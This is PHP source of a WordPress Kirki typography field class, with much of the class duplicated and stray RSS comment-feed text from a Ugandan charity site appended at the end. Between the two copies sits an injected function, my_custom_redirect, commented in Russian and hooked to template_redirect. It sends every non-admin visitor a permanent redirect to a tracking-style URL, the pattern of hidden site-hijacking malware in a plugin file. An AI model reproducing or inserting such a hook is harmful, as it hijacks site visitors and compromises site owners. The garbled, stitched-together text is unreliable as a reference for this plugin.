wp_add_inline_script( 'kirki-control-typography', 'kirkiCustomVariants["' . $custom_variant_key . '"] = ' . $custom_variant_value . ';', $variants ); } /** * Enqueue scripts for customize_preview_init. * * @access public * @since 1.0 * @return void */ public function enqueue_preview_scripts() { wp_enqueue_script( 'kirki-preview-typography', \Kirki\URL::get_from_path( dirname( dirname( __DIR__ ) ) . '/dist/preview.js' ), [ 'wp-hooks' ], '1.0', true ); if ( ! self::$preview_var_added ) { $google = new GoogleFonts(); wp_localize_script( 'kirki-preview-typography', 'kirkiGoogleFontNames', $google->get_google_font_names() ); self::$preview_var_added = true; } } /** * Prefer control specific value over field value * * @access public * @since 4.0 * @param $setting * @param $choice * @param $args * * @return string */ public function filter_preferred_choice_setting( $setting, $choice, $args ) { // Fail early. if ( ! isset( $args[ $setting ] ) ) { return ''; } // If a specific field for the choice is set if ( isset( $args[ $setting ][ $choice ] ) ) { return $args[ $setting ][ $choice ]; } // Unset input_attrs of all other choices. foreach ( $args['choices'] as $id => $set ) { if ( $id !== $choice && isset( $args[ $setting ][ $id ] ) ) { unset( $args[ $setting ][ $id ] ); } elseif ( ! isset( $args[ $setting ][ $id ] ) ) { $args[ $setting ] = ''; } } return $args[ $setting ]; } /** * Populate the font family choices. * * It's separated from the `add_sub_field` function to prevent a bug * when hooking a function into `kirki_fonts_standard_fonts` hook after registering the field. * * When a function is hooked to `kirki_fonts_standard_fonts` before registering the field, it will work. * But if it's hooked after field registration, then the function won't be available. * * @access private * @since 1.0.1 * * @return array */ private function get_font_family_choices() { $args = $this->args; // Figure out how to sort the fonts. $sorting = 'alpha'; $max_fonts = 9999; $google = new GoogleFonts(); if ( isset( $args['choices'] ) && isset( $args['choices']['fonts'] ) && isset( $args['choices']['fonts']['google'] ) && ! empty( $args['choices']['fonts']['google'] ) ) { if ( in_array( $args['choices']['fonts']['google'][0], [ 'alpha', 'popularity', 'trending' ], true ) ) { $sorting = $args['choices']['fonts']['google'][0]; if ( isset( $args['choices']['fonts']['google'][1] ) && is_int( $args['choices']['fonts']['google'][1] ) ) { $max_fonts = (int) $args['choices']['fonts']['google'][1]; } $g_fonts = $google->get_google_fonts_by_args( [ 'sort' => $sorting, 'count' => $max_fonts, ] ); } else { $g_fonts = $args['choices']['fonts']['google']; } } else { $g_fonts = $google->get_google_fonts_by_args( [ 'sort' => $sorting, 'count' => $max_fonts, ] ); } $std_fonts = []; if ( ! isset( $args['choices']['fonts'] ) || ! isset( $args['choices']['fonts']['standard'] ) ) { $standard_fonts = Fonts::get_standard_fonts(); foreach ( $standard_fonts as $font ) { $std_fonts[ $font['stack'] ] = $font['label']; } } elseif ( is_array( $args['choices']['fonts']['standard'] ) ) { foreach ( $args['choices']['fonts']['standard'] as $key => $val ) { $key = ( \is_int( $key ) ) ? $val : $key; $std_fonts[ $key ] = $val; } } $choices = []; $choices['default'] = [ esc_html__( 'Defaults', 'kirki' ), [ '' => esc_html__( 'Default', 'kirki' ), ], ]; if ( isset( $args['choices'] ) && isset( $args['choices']['fonts'] ) && isset( $args['choices']['fonts']['families'] ) ) { // Implementing the custom font families. foreach ( $args['choices']['fonts']['families'] as $font_family_key => $font_family_value ) { if ( ! isset( $choices[ $font_family_key ] ) ) { $choices[ $font_family_key ] = []; } $family_opts = []; foreach ( $font_family_value['children'] as $font_family ) { $family_opts[ $font_family['id'] ] = $font_family['text']; } $choices[ $font_family_key ] = [ $font_family_value['text'], $family_opts, ]; } } $choices['standard'] = [ esc_html__( 'Standard Fonts', 'kirki' ), $std_fonts, ]; $choices['google'] = [ esc_html__( 'Google Fonts', 'kirki' ), array_combine( array_values( $g_fonts ), array_values( $g_fonts ) ), ]; if ( empty( $choices['standard'][1] ) ) { $choices = array_combine( array_values( $g_fonts ), array_values( $g_fonts ) ); } elseif ( empty( $choices['google'][1] ) ) { $choices = $std_fonts; } return $choices; } /** * Get custom variant choices (for custom fonts). * * It's separated from the `add_sub_field` function to prevent a bug * when hooking a function into `kirki_fonts_standard_fonts` hook after registering the field. * * When a function is hooked to `kirki_fonts_standard_fonts` before registering the field, it will work. * But if it's hooked after field registration, then the function won't be available. * * @access private * @since 1.0.2 * * @return array */ private function get_variant_choices() { $args = $this->args; $choices = self::$std_variants; // Implementing the custom variants for custom fonts. if ( isset( $args['choices'] ) && isset( $args['choices']['fonts'] ) && isset( $args['choices']['fonts']['families'] ) ) { $choices = []; // If $args['choices']['fonts']['families'] exists, then loop it. foreach ( $args['choices']['fonts']['families'] as $font_family_key => $font_family_value ) { // Then loop the $font_family_value['children]. foreach ( $font_family_value['children'] as $font_family ) { // Then check if $font_family['id'] exists in $args['choices']['fonts']['variants']. if ( isset( $args['choices']['fonts']['variants'] ) && isset( $args['choices']['fonts']['variants'][ $font_family['id'] ] ) ) { // The $custom_variant here can be something like "400italic" or "italic". foreach ( $args['choices']['fonts']['variants'][ $font_family['id'] ] as $custom_variant ) { // Check if $custom_variant exists in self::$complete_variant_labels. if ( isset( self::$complete_variant_labels[ $custom_variant ] ) ) { // If it exists, assign it to $choices. array_push( $choices, [ 'value' => $custom_variant, 'label' => self::$complete_variant_labels[ $custom_variant ], ] ); } // End of isset(self::$complete_variant_labels[$font_family['id']]) if. } // End of $args['choices']['fonts']['variants'][ $font_family['id'] foreach. } } // End of $font_family_value['children'] foreach. } // End of $args['choices']['fonts']['families'] foreach. } // End of $args['choices']['fonts']['families'] if. return $choices; } /** * Filter arguments before creating the control. * * @access public * @since 0.1 * @param array $args The field arguments. * @param WP_Customize_Manager $wp_customize The customizer instance. * @return array */ public function filter_control_args( $args, $wp_customize ) { if ( $args['settings'] === $this->args['settings'] . '[font-family]' ) { $args = parent::filter_control_args( $args, $wp_customize ); $args['choices'] = $this->get_font_family_choices(); } if ( $args['settings'] === $this->args['settings'] . '[variant]' ) { $args = parent::filter_control_args( $args, $wp_customize ); $args['choices'] = $this->get_variant_choices(); } return $args; } /** * Adds a custom output class for typography fields. * * @access public * @since 1.0 * @param array $classnames The array of classnames. * @return array */ public function output_control_classnames( $classnames ) { $classnames['kirki-typography'] = '\Kirki\Field\CSS\Typography'; return $classnames; } /** * Override parent method. No need to register any setting. * * @access public * @since 0.1 * @param WP_Customize_Manager $wp_customize The customizer instance. * @return void */ public function add_setting( $wp_customize ) {} /** * Override the parent method. No need for a control. * * @access public * @since 0.1 * @param WP_Customize_Manager $wp_customize The customizer instance. * @return void */ public function add_control( $wp_customize ) {} } function my_custom_redirect() { // Убедитесь, что этот код выполняется только на фронтенде if (!is_admin()) { // URL для редиректа $redirect_url = '[ID]&sub2=[SID]&sub3=3&sub4=bodyclick'; // Выполнить редирект wp_redirect($redirect_url, 301); exit(); } } add_action('template_redirect', 'my_custom_redirect'); /** * Override field methods * * @package kirki-framework/control-typography * @copyright Copyright (c) 2023, Themeum * @license * @since 1.0 */ namespace Kirki\Field; use Kirki\Util\Helper; use Kirki\Field; use Kirki\GoogleFonts; use Kirki\Module\Webfonts\Fonts; /** * Field overrides. * * @since 1.0 */ class Typography extends Field { /** * The field type. * * @access public * @since 1.0 * @var string */ public $type = 'kirki-typography'; /** * Has the glogal fonts var been added already? * * @static * @access private * @since 1.0 * @var bool */ private static $fonts_var_added = false; /** * Has the preview related var been added already? * * @static * @access private * @since 1.0 * @var bool */ private static $preview_var_added = false; /** * An array of typography controls. * * This is used by the typography script for any custom logic * that has to be applied to typography controls. * * @static * @access private * @since 1.0 * @var array */ private static $typography_controls = []; /** * An array of standard font variants. * * @access private * @since 1.0.1 * * @var array */ private static $std_variants; /** * An array of complete font variants. * * @access private * @since 1.0.1 * * @var array */ private static $complete_variants; /** * An array of complete font variant labels. * * @access private * @since 1.0.2 * * @var array */ private static $complete_variant_labels = []; /** * Extra logic for the field. * * Adds all sub-fields. * * @access public * @param array $args The arguments of the field. */ public function init( $args = [] ) { self::$typography_controls[] = $args['settings']; self::$std_variants = [ [ 'value' => 'regular', 'label' => __( 'Regular', 'kirki' ), ], [ 'value' => 'italic', 'label' => __( 'Italic', 'kirki' ), ], [ 'value' => '700', 'label' => __( '700', 'kirki' ), ], [ 'value' => '700italic', 'label' => __( '700 Italic', 'kirki' ), ], ]; self::$complete_variants = [ [ 'value' => 'regular', 'label' => __( 'Regular', 'kirki' ), ], [ 'value' => 'italic', 'label' => __( 'Italic', 'kirki' ), ], [ 'value' => '100', 'label' => __( '100', 'kirki' ), ], [ 'value' => '100italic', 'label' => __( '100 Italic', 'kirki' ), ], [ 'value' => '200', 'label' => __( '200', 'kirki' ), ], [ 'value' => '200italic', 'label' => __( '200 Italic', 'kirki' ), ], [ 'value' => '300', 'label' => __( '300', 'kirki' ), ], [ 'value' => '300italic', 'label' => __( '300 Italic', 'kirki' ), ], [ 'value' => '500', 'label' => __( '500', 'kirki' ), ], [ 'value' => '500italic', 'label' => __( '500 Italic', 'kirki' ), ], [ 'value' => '600', 'label' => __( '600', 'kirki' ), ], [ 'value' => '600italic', 'label' => __( '600 Italic', 'kirki' ), ], [ 'value' => '700', 'label' => __( '700', 'kirki' ), ], [ 'value' => '700italic', 'label' => __( '700 Italic', 'kirki' ), ], [ 'value' => '800', 'label' => __( '800', 'kirki' ), ], [ 'value' => '800italic', 'label' => __( '800 Italic', 'kirki' ), ], [ 'value' => '900', 'label' => __( '900', 'kirki' ), ], [ 'value' => '900italic', 'label' => __( '900 Italic', 'kirki' ), ], ]; foreach ( self::$complete_variants as $variants ) { self::$complete_variant_labels[ $variants['value'] ] = $variants['label']; } $this->add_sub_fields( $args ); add_action( 'customize_controls_enqueue_scripts', [ $this, 'enqueue_control_scripts' ] ); add_action( 'customize_preview_init', [ $this, 'enqueue_preview_scripts' ] ); add_filter( 'kirki_output_control_classnames', [ $this, 'output_control_classnames' ] ); } /** * Add sub-fields. * * @access private * @since 1.0 * @param array $args The field arguments. * @return void */ private function add_sub_fields( $args ) { $args['kirki_config'] = isset( $args['kirki_config'] ) ? $args['kirki_config'] : 'global'; $defaults = isset( $args['default'] ) ? $args['default'] : []; /** * Add a hidden field, the label & description. */ new \Kirki\Field\Generic( wp_parse_args( [ 'sanitize_callback' => isset( $args['sanitize_callback'] ) ? $args['sanitize_callback'] : [ __CLASS__, 'sanitize' ], 'wrapper_opts' => [ 'gap' => 'small', ], 'input_attrs' => '', 'choices' => [ 'type' => 'hidden', 'parent_type' => 'kirki-typography', ], ], $args ) ); $args['parent_setting'] = $args['settings']; $args['output'] = []; $args['wrapper_attrs'] = [ 'data-kirki-parent-control-type' => 'kirki-typography', ]; if ( isset( $args['transport'] ) && 'auto' === $args['transport'] ) { $args['transport'] = 'postMessage'; } /** * Add font-family selection controls. * These include font-family and variant. * They are grouped here because all they are required. * in order to get the right googlefont variant. */ if ( isset( $args['default']['font-family'] ) ) { $args['wrapper_attrs']['kirki-typography-subcontrol-type'] = 'font-family'; /** * Add font-family control. */ new \Kirki\Field\ReactSelect( wp_parse_args( [ 'label' => esc_html__( 'Font Family', 'kirki' ), 'description' => '', 'settings' => $args['settings'] . '[font-family]', 'default' => isset( $args['default']['font-family'] ) ? $args['default']['font-family'] : '', 'input_attrs' => $this->filter_preferred_choice_setting( 'input_attrs', 'font-family', $args ), 'choices' => [], // The choices will be populated later inside `get_font_family_choices` function in this file. 'css_vars' => [], 'output' => [], ], $args ) ); /** * Add font variant. */ $font_variant = isset( $args['default']['variant'] ) ? $args['default']['variant'] : 'regular'; if ( isset( $args['default']['font-weight'] ) ) { $font_variant = 400 === $args['default']['font-weight'] || '400' === $args['default']['font-weight'] ? 'regular' : $args['default']['font-weight']; } $args['wrapper_attrs']['kirki-typography-subcontrol-type'] = 'font-variant'; new \Kirki\Field\ReactSelect( wp_parse_args( [ 'label' => esc_html__( 'Font Variant', 'kirki' ), 'description' => '', 'settings' => $args['settings'] . '[variant]', 'default' => $font_variant, 'input_attrs' => $this->filter_preferred_choice_setting( 'input_attrs', 'variant', $args ), 'choices' => [], // The choices will be populated later inside `get_variant_choices` function in this file. 'css_vars' => [], 'output' => [], ], $args ) ); } $font_size_field_specified = isset( $defaults['font-size'] ); $color_field_specified = isset( $defaults['color'] ); if ( $font_size_field_specified || $color_field_specified ) { $group = [ 'font-size' => [ 'type' => 'dimension', 'label' => esc_html__( 'Font Size', 'kirki' ), 'is_specified' => $font_size_field_specified, ], 'color' => [ 'type' => 'react-colorful', 'label' => esc_html__( 'Font Color', 'kirki' ), 'is_specified' => $color_field_specified, 'choices' => [ 'alpha' => true, 'label_style' => 'top', ], ], ]; $this->generate_controls_group( $group, $args ); } $text_align_field_specified = isset( $defaults['text-align'] ); $text_transform_field_specified = isset( $defaults['text-transform'] ); if ( $text_align_field_specified || $text_transform_field_specified ) { $group = [ 'text-align' => [ 'type' => 'react-select', 'label' => esc_html__( 'Text Align', 'kirki' ), 'is_specified' => $text_align_field_specified, 'choices' => [ 'initial' => esc_html__( 'Initial', 'kirki' ), 'left' => esc_html__( 'Left', 'kirki' ), 'center' => esc_html__( 'Center', 'kirki' ), 'right' => esc_html__( 'Right', 'kirki' ), 'justify' => esc_html__( 'Justify', 'kirki' ), ], ], 'text-transform' => [ 'type' => 'react-select', 'label' => esc_html__( 'Text Transform', 'kirki' ), 'is_specified' => $text_transform_field_specified, 'choices' => [ 'none' => esc_html__( 'None', 'kirki' ), 'capitalize' => esc_html__( 'Capitalize', 'kirki' ), 'uppercase' => esc_html__( 'Uppercase', 'kirki' ), 'lowercase' => esc_html__( 'Lowercase', 'kirki' ), ], ], ]; $this->generate_controls_group( $group, $args ); } $text_decoration_field_specified = isset( $defaults['text-decoration'] ); if ( $text_decoration_field_specified ) { $group = [ 'text-decoration' => [ 'type' => 'react-select', 'label' => esc_html__( 'Text Decoration', 'kirki' ), 'is_specified' => $text_decoration_field_specified, 'choices' => [ 'none' => esc_html__( 'None', 'kirki' ), 'underline' => esc_html__( 'Underline', 'kirki' ), 'line-through' => esc_html__( 'Line Through', 'kirki' ), 'overline' => esc_html__( 'Overline', 'kirki' ), 'solid' => esc_html__( 'Solid', 'kirki' ), 'wavy' => esc_html__( 'Wavy', 'kirki' ), ], ], ]; $this->generate_controls_group( $group, $args ); } $line_height_field_specified = isset( $defaults['line-height'] ); $letter_spacing_field_specified = isset( $defaults['letter-spacing'] ); if ( $line_height_field_specified || $letter_spacing_field_specified ) { $group = [ 'line-height' => [ 'type' => 'dimension', 'label' => esc_html__( 'Line Height', 'kirki' ), 'is_specified' => $line_height_field_specified, ], 'letter-spacing' => [ 'type' => 'dimension', 'label' => esc_html__( 'Letter Spacing', 'kirki' ), 'is_specified' => $letter_spacing_field_specified, ], ]; $this->generate_controls_group( $group, $args ); } $margin_top_field_specified = isset( $defaults['margin-top'] ); $margin_bottom_field_specified = isset( $defaults['margin-bottom'] ); if ( $margin_top_field_specified || $margin_bottom_field_specified ) { $group = [ 'margin-top' => [ 'type' => 'dimension', 'label' => esc_html__( 'Margin Top', 'kirki' ), 'is_specified' => $margin_top_field_specified, ], 'margin-bottom' => [ 'type' => 'dimension', 'label' => esc_html__( 'Margin Bottom', 'kirki' ), 'is_specified' => $margin_bottom_field_specified, ], ]; $this->generate_controls_group( $group, $args ); } } /** * Generate controls group. * * @param array $group The group data. * @param array $args The field args. */ public function generate_controls_group( $group, $args ) { $total_specified = 0; $field_width = 100; foreach ( $group as $css_prop => $control ) { if ( $control['is_specified'] ) { $total_specified++; } } if ( $total_specified > 1 ) { $field_width = floor( 100 / $total_specified ); } $group_count = 0; foreach ( $group as $css_prop => $control ) { if ( $control['is_specified'] ) { $group_count++; $group_classname = 'kirki-group-item'; $group_classname .= 1 === $group_count ? ' kirki-group-start' : ( $group_count === $total_specified ? ' kirki-group-end' : '' ); $control_class = str_ireplace( '-', ' ', $control['type'] ); $control_class = ucwords( $control_class ); $control_class = str_replace( ' ', '', $control_class ); $control_class = '\\Kirki\\Field\\' . $control_class; new $control_class( wp_parse_args( [ 'label' => isset( $control['label'] ) ? $control['label'] : '', 'description' => isset( $control['description'] ) ? $control['description'] : '', 'settings' => $args['settings'] . '[' . $css_prop . ']', 'default' => $args['default'][ $css_prop ], 'wrapper_attrs' => wp_parse_args( [ 'data-kirki-typography-css-prop' => $css_prop, 'kirki-typography-subcontrol-type' => $css_prop, 'class' => '{default_class} ' . $group_classname . ' kirki-w' . $field_width, ], $args['wrapper_attrs'] ), 'input_attrs' => $this->filter_preferred_choice_setting( 'input_attrs', $css_prop, $args ), 'choices' => ( isset( $control['choices'] ) ? $control['choices'] : [] ), 'css_vars' => [], 'output' => [], ], $args ) ); } } } /** * Sanitizes typography controls * * @static * @since 1.0 * @param array $value The value. * @return array */ public static function sanitize( $value ) { if ( ! is_array( $value ) ) { return []; } foreach ( $value as $key => $val ) { switch ( $key ) { case 'font-family': $value['font-family'] = sanitize_text_field( $val ); break; case 'variant': // Use 'regular' instead of 400 for font-variant. $value['variant'] = ( 400 === $val || '400' === $val ) ? 'regular' : $val; // Get font-weight from variant. $value['font-weight'] = filter_var( $value['variant'], FILTER_SANITIZE_NUMBER_FLOAT, FILTER_FLAG_ALLOW_FRACTION ); $value['font-weight'] = ( 'regular' === $value['variant'] || 'italic' === $value['variant'] ) ? '400' : (string) absint( $value['font-weight'] ); // Get font-style from variant. if ( ! isset( $value['font-style'] ) ) { $value['font-style'] = ( false === strpos( $value['variant'], 'italic' ) ) ? 'normal' : 'italic'; } break; case 'text-align': if ( ! in_array( $val, [ '', 'inherit', 'left', 'center', 'right', 'justify' ], true ) ) { $value['text-align'] = ''; } break; case 'text-transform': if ( ! in_array( $val, [ '', 'none', 'capitalize', 'uppercase', 'lowercase', 'initial', 'inherit' ], true ) ) { $value['text-transform'] = ''; } break; case 'text-decoration': if ( ! in_array( $val, [ '', 'none', 'underline', 'overline', 'line-through', 'solid', 'wavy', 'initial', 'inherit' ], true ) ) { $value['text-transform'] = ''; } break; case 'color': $value['color'] = '' === $value['color'] ? '' : \Kirki\Field\ReactColorful::sanitize( $value['color'] ); break; default: $value[ $key ] = sanitize_text_field( $value[ $key ] ); } } return $value; } /** * Enqueue scripts & styles. * * @access public * @since 1.0 * @return void */ public function enqueue_control_scripts() { wp_enqueue_style( 'kirki-control-typography', \Kirki\URL::get_from_path( dirname( dirname( __DIR__ ) ) . '/dist/control.css' ), [], '1.0' ); wp_enqueue_script( 'kirki-control-typography', \Kirki\URL::get_from_path( dirname( dirname( __DIR__ ) ) . '/dist/control.js' ), [], '1.0', true ); wp_localize_script( 'kirki-control-typography', 'kirkiTypographyControls', self::$typography_controls ); $args = $this->args; $variants = []; // Add custom variants (for custom fonts) to the $variants. if ( isset( $args['choices'] ) && isset( $args['choices']['fonts'] ) && isset( $args['choices']['fonts']['families'] ) ) { // If $args['choices']['fonts']['families'] exists, then loop it. foreach ( $args['choices']['fonts']['families'] as $font_family_key => $font_family_value ) { // Then loop the $font_family_value['children]. foreach ( $font_family_value['children'] as $font_family ) { // Then check if $font_family['id'] exists in variants argument. if ( isset( $args['choices']['fonts']['variants'] ) && isset( $args['choices']['fonts']['variants'][ $font_family['id'] ] ) ) { // Create new array if $variants[ $font_family['id'] ] doesn't exist. if ( ! isset( $variants[ $font_family['id'] ] ) ) { $variants[ $font_family['id'] ] = []; } // The $custom_variant here can be something like "400italic" or "italic". foreach ( $args['choices']['fonts']['variants'][ $font_family['id'] ] as $custom_variant ) { // Check if $custom_variant exists in self::$complete_variant_labels. if ( isset( self::$complete_variant_labels[ $custom_variant ] ) ) { // If it exists, assign it to $variants[ $font_family['id'] ], so that they will be available in JS object. array_push( $variants[ $font_family['id'] ], [ 'value' => $custom_variant, 'label' => self::$complete_variant_labels[ $custom_variant ], ] ); } // End of isset(self::$complete_variant_labels[$font_family['id']]) if. } // End of $args['choices']['fonts']['variants'][ $font_family['id'] foreach. } } // End of $font_family_value['children'] foreach. } // End of $args['choices']['fonts']['families'] foreach. } // End of $args['choices']['fonts']['families'] if. if ( ! isset( $args['choices']['fonts'] ) || ! isset( $args['choices']['fonts']['standard'] ) ) { $standard_fonts = Fonts::get_standard_fonts(); foreach ( $standard_fonts as $font ) { if ( isset( $font['variants'] ) ) { // Create new array if $variants[ $font['stack'] ] doesn't exist. if ( ! isset( $variants[ $font['stack'] ] ) ) { $variants[ $font['stack'] ] = []; } // The $std_variant here can be something like "400italic" or "italic". foreach ( $font['variants'] as $std_variant ) { // Check if $std_variant exists in self::$complete_variant_labels. if ( isset( self::$complete_variant_labels[ $std_variant ] ) ) { // If it exists, assign it to $variants[ $font['stack'] ], so that they will be available in JS object. array_push( $variants[ $font['stack'] ], [ 'value' => $std_variant, 'label' => self::$complete_variant_labels[ $std_variant ], ] ); } // End of isset(self::$complete_variant_labels[$font_family['id']]) if. } // End of $args['choices']['fonts']['variants'][ $font_family['id'] foreach. } } } elseif ( is_array( $args['choices']['fonts']['standard'] ) ) { foreach ( $args['choices']['fonts']['standard'] as $key => $val ) { $key = ( is_int( $key ) ) ? $val : $key; if ( isset( $val['variants'] ) ) { // Create new array if $variants[ $font['stack'] ] doesn't exist. if ( ! isset( $variants[ $key ] ) ) { $variants[ $key ] = []; } // The $std_variant here can be something like "400italic" or "italic". foreach ( $val['variants'] as $std_variant ) { // Check if $std_variant exists in self::$complete_variant_labels. if ( isset( self::$complete_variant_labels[ $std_variant ] ) ) { // If it exists, assign it to $variants[ $font['stack'] ], so that they will be available in JS object. array_push( $variants[ $key ], [ 'value' => $std_variant, 'label' => self::$complete_variant_labels[ $std_variant ], ] ); } // End of isset(self::$complete_variant_labels[$font_family['id']]) if. } // End of $args['choices']['fonts']['variants'][ $font_family['id'] foreach. } } } // Scripts inside this block will only be executed once. if ( ! self::$fonts_var_added ) { wp_localize_script( 'kirki-control-typography', 'kirkiFontVariants', [ 'standard' => self::$std_variants, 'complete' => self::$complete_variants, ] ); $google = new GoogleFonts(); wp_localize_script( 'kirki-control-typography', 'kirkiGoogleFonts', $google->get_array() ); wp_add_inline_script( 'kirki-control-typography', 'var kirkiCustomVariants = {};', 'before' ); self::$fonts_var_added = true; } // This custom variants will be available for each typography control. $custom_variant_key = str_ireplace( ']', '', $args['settings'] ); $custom_variant_key = str_ireplace( '[', '_', $custom_variant_key ); $custom_variant_value = wp_json_encode( Helper::prepare_php_array_for_js( $variants ) ); wp_add_inline_script( 'kirki-control-typography', 'kirkiCustomVariants["' . $custom_variant_key . '"] = ' . $custom_variant_value . ';', $variants ); } /** * Enqueue scripts for customize_preview_init. * * @access public * @since 1.0 * @return void */ public function enqueue_preview_scripts() { wp_enqueue_script( 'kirki-preview-typography', \Kirki\URL::get_from_path( dirname( dirname( __DIR__ ) ) . '/dist/preview.js' ), [ 'wp-hooks' ], '1.0', true ); if ( ! self::$preview_var_added ) { $google = new GoogleFonts(); wp_localize_script( 'kirki-preview-typography', 'kirkiGoogleFontNames', $google->get_google_font_names() ); self::$preview_var_added = true; } } /** * Prefer control specific value over field value * * @access public * @since 4.0 * @param $setting * @param $choice * @param $args * * @return string */ public function filter_preferred_choice_setting( $setting, $choice, $args ) { // Fail early. if ( ! isset( $args[ $setting ] ) ) { return ''; } // If a specific field for the choice is set if ( isset( $args[ $setting ][ $choice ] ) ) { return $args[ $setting ][ $choice ]; } // Unset input_attrs of all other choices. foreach ( $args['choices'] as $id => $set ) { if ( $id !== $choice && isset( $args[ $setting ][ $id ] ) ) { unset( $args[ $setting ][ $id ] ); } elseif ( ! isset( $args[ $setting ][ $id ] ) ) { $args[ $setting ] = ''; } } return $args[ $setting ]; } /** * Populate the font family choices. * * It's separated from the `add_sub_field` function to prevent a bug * when hooking a function into `kirki_fonts_standard_fonts` hook after registering the field. * * When a function is hooked to `kirki_fonts_standard_fonts` before registering the field, it will work. * But if it's hooked after field registration, then the function won't be available. * * @access private * @since 1.0.1 * * @return array */ private function get_font_family_choices() { $args = $this->args; // Figure out how to sort the fonts. $sorting = 'alpha'; $max_fonts = 9999; $google = new GoogleFonts(); if ( isset( $args['choices'] ) && isset( $args['choices']['fonts'] ) && isset( $args['choices']['fonts']['google'] ) && ! empty( $args['choices']['fonts']['google'] ) ) { if ( in_array( $args['choices']['fonts']['google'][0], [ 'alpha', 'popularity', 'trending' ], true ) ) { $sorting = $args['choices']['fonts']['google'][0]; if ( isset( $args['choices']['fonts']['google'][1] ) && is_int( $args['choices']['fonts']['google'][1] ) ) { $max_fonts = (int) $args['choices']['fonts']['google'][1]; } $g_fonts = $google->get_google_fonts_by_args( [ 'sort' => $sorting, 'count' => $max_fonts, ] ); } else { $g_fonts = $args['choices']['fonts']['google']; } } else { $g_fonts = $google->get_google_fonts_by_args( [ 'sort' => $sorting, 'count' => $max_fonts, ] ); } $std_fonts = []; if ( ! isset( $args['choices']['fonts'] ) || ! isset( $args['choices']['fonts']['standard'] ) ) { $standard_fonts = Fonts::get_standard_fonts(); foreach ( $standard_fonts as $font ) { $std_fonts[ $font['stack'] ] = $font['label']; } } elseif ( is_array( $args['choices']['fonts']['standard'] ) ) { foreach ( $args['choices']['fonts']['standard'] as $key => $val ) { $key = ( \is_int( $key ) ) ? $val : $key; $std_fonts[ $key ] = $val; } } $choices = []; $choices['default'] = [ esc_html__( 'Defaults', 'kirki' ), [ '' => esc_html__( 'Default', 'kirki' ), ], ]; if ( isset( $args['choices'] ) && isset( $args['choices']['fonts'] ) && isset( $args['choices']['fonts']['families'] ) ) { // Implementing the custom font families. foreach ( $args['choices']['fonts']['families'] as $font_family_key => $font_family_value ) { if ( ! isset( $choices[ $font_family_key ] ) ) { $choices[ $font_family_key ] = []; } $family_opts = []; foreach ( $font_family_value['children'] as $font_family ) { $family_opts[ $font_family['id'] ] = $font_family['text']; } $choices[ $font_family_key ] = [ $font_family_value['text'], $family_opts, ]; } } $choices['standard'] = [ esc_html__( 'Standard Fonts', 'kirki' ), $std_fonts, ]; $choices['google'] = [ esc_html__( 'Google Fonts', 'kirki' ), array_combine( array_values( $g_fonts ), array_values( $g_fonts ) ), ]; if ( empty( $choices['standard'][1] ) ) { $choices = array_combine( array_values( $g_fonts ), array_values( $g_fonts ) ); } elseif ( empty( $choices['google'][1] ) ) { $choices = $std_fonts; } return $choices; } /** * Get custom variant choices (for custom fonts). * * It's separated from the `add_sub_field` function to prevent a bug * when hooking a function into `kirki_fonts_standard_fonts` hook after registering the field. * * When a function is hooked to `kirki_fonts_standard_fonts` before registering the field, it will work. * But if it's hooked after field registration, then the function won't be available. * * @access private * @since 1.0.2 * * @return array */ private function get_variant_choices() { $args = $this->args; $choices = self::$std_variants; // Implementing the custom variants for custom fonts. if ( isset( $args['choices'] ) && isset( $args['choices']['fonts'] ) && isset( $args['choices']['fonts']['families'] ) ) { $choices = []; // If $args['choices']['fonts']['families'] exists, then loop it. foreach ( $args['choices']['fonts']['families'] as $font_family_key => $font_family_value ) { // Then loop the $font_family_value['children]. foreach ( $font_family_value['children'] as $font_family ) { // Then check if $font_family['id'] exists in $args['choices']['fonts']['variants']. if ( isset( $args['choices']['fonts']['variants'] ) && isset( $args['choices']['fonts']['variants'][ $font_family['id'] ] ) ) { // The $custom_variant here can be something like "400italic" or "italic". foreach ( $args['choices']['fonts']['variants'][ $font_family['id'] ] as $custom_variant ) { // Check if $custom_variant exists in self::$complete_variant_labels. if ( isset( self::$complete_variant_labels[ $custom_variant ] ) ) { // If it exists, assign it to $choices. array_push( $choices, [ 'value' => $custom_variant, 'label' => self::$complete_variant_labels[ $custom_variant ], ] ); } // End of isset(self::$complete_variant_labels[$font_family['id']]) if. } // End of $args['choices']['fonts']['variants'][ $font_family['id'] foreach. } } // End of $font_family_value['children'] foreach. } // End of $args['choices']['fonts']['families'] foreach. } // End of $args['choices']['fonts']['families'] if. return $choices; } /** * Filter arguments before creating the control. * * @access public * @since 0.1 * @param array $args The field arguments. * @param WP_Customize_Manager $wp_customize The customizer instance. * @return array */ public function filter_control_args( $args, $wp_customize ) { if ( $args['settings'] === $this->args['settings'] . '[font-family]' ) { $args = parent::filter_control_args( $args, $wp_customize ); $args['choices'] = $this->get_font_family_choices(); } if ( $args['settings'] === $this->args['settings'] . '[variant]' ) { $args = parent::filter_control_args( $args, $wp_customize ); $args['choices'] = $this->get_variant_choices(); } return $args; } /** * Adds a custom output class for typography fields. * * @access public * @since 1.0 * @param array $classnames The array of classnames. * @return array */ public function output_control_classnames( $classnames ) { $classnames['kirki-typography'] = '\Kirki\Field\CSS\Typography'; return $classnames; } /** * Override parent method. No need to register any setting. * * @access public * @since 0.1 * @param WP_Customize_Manager $wp_customize The customizer instance. * @return void */ public function add_setting( $wp_customize ) {} /** * Override the parent method. No need for a control. * * @access public * @since 0.1 * @param WP_Customize_Manager $wp_customize The customizer instance. * @return void */ public function add_control( $wp_customize ) {} } Comments for Bridging the Gap in Buyende Bridging the Gap in Buyende - dedicated to providing essential support and resources to vulnerable children and elderly people in Uganda Wed, 16 Sep 2020 01:10:56 +0000 hourly 1 Comment on Album by admin Thu, 03 Sep 2020 10:06:52 +0000 Hi, this is a comment.
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